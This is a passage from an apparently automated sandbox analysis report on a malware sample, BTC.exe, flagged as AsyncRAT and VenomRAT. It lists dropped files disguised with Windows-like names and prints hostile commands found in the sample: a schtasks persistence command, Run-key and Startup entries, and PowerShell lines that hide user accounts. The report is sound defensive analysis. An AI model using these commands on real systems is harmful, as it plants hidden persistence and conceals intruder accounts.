                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeCode function: 26_2_00007FF848F329CA push eax; ret 26_2_00007FF848F329CB
                            Source: BTC.exeStatic PE information: section name: .text entropy: 7.998268120908593

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files with benign system names
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\crack.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\Window Security.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeFile created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeFile created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\update.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\Cracked.exeJump to dropped file

                            Boot Survival

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Service Host
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Service Host

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Contains functionality to hide user accounts
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
                            Source: Window Security.exe.0.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: Window Security.exe.0.drString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
                            Source: Window Security.exe.0.drString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
                            Source: Windows Security.exe.6.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: Windows Security.exe.6.drString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
                            Source: Windows Security.exe.6.drString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeFile opened: C:\Users\user\AppData\Roaming\Window Security.exe:Zone.Identifier read attributes | delete
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeFile opened: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe:Zone.Identifier read attributes | delete
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeFile opened: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe:Zone.Identifier read attributes | delete
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
